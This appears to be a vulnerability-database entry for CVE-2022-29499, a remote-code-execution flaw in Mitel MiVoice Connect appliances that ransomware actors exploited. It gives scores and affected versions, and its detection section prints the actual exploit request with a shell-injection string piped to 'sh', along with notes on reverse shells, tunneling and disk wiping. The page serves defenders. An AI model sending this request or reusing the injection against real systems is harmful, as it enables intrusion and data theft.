cbcvebase.
CVE-2022-29499
published 2022-04-26

CVE-2022-29499: The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service…

PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-07-18
Exploited in the wild
EPSS
56.97%
98.9th percentile
The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.

Affected

1 ranges
VendorProductVersion rangeFixed in
mitelmivoice_connect<= 22.20.2300.0

Detection & IOCsextracted from sources · hover to see the quote

urlGET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1
path/scripts/vtest.php
path/ucbsync.php
commandcmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|?
  • The exploit targets the `get_url` parameter in `/scripts/vtest.php` on Mitel MiVoice Connect appliances, chaining through `/ucbsync.php` with a `syncfile` command that injects shell commands via `$PWD|sh|?` to achieve RCE and establish a reverse shell.
  • Threat actor performed anti-forensic wiping using `dd` to overwrite disk space and `rm` to delete files from the VOIP device filesystem after detection; look for `dd` writing to `/tmp/2` and mass `rm` activity on Mitel appliances.
  • Post-exploitation tools Chisel and FileZilla were used by Lorenz actors for pivoting, tunneling, and data exfiltration after gaining initial access via CVE-2022-29499.
  • Check Point IPS signature 'Mitel MiVoice Connect Command Injection (CVE-2022-29499)' can be used as a detection reference for network-level detection of exploit attempts.
  • The responses to the outbound exploit requests demonstrated that the attacker used the exploit to create a reverse shell; monitor Mitel appliances for unexpected outbound connections following requests to `/scripts/vtest.php` or `/ucbsync.php`.
  • ·The IP addresses shown in the exploit log entries (1.1.256.1 and 2.2.256.2) are invalid/obfuscated addresses used in the CrowdStrike write-up for redaction purposes and are NOT real attacker infrastructure IOCs.
  • ·Affected products are specifically the Service Appliance (SA) components: SA 100, SA 400, and Virtual SA in Mitel MiVoice Connect through version 19.2 SP3; scope detection rules accordingly.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.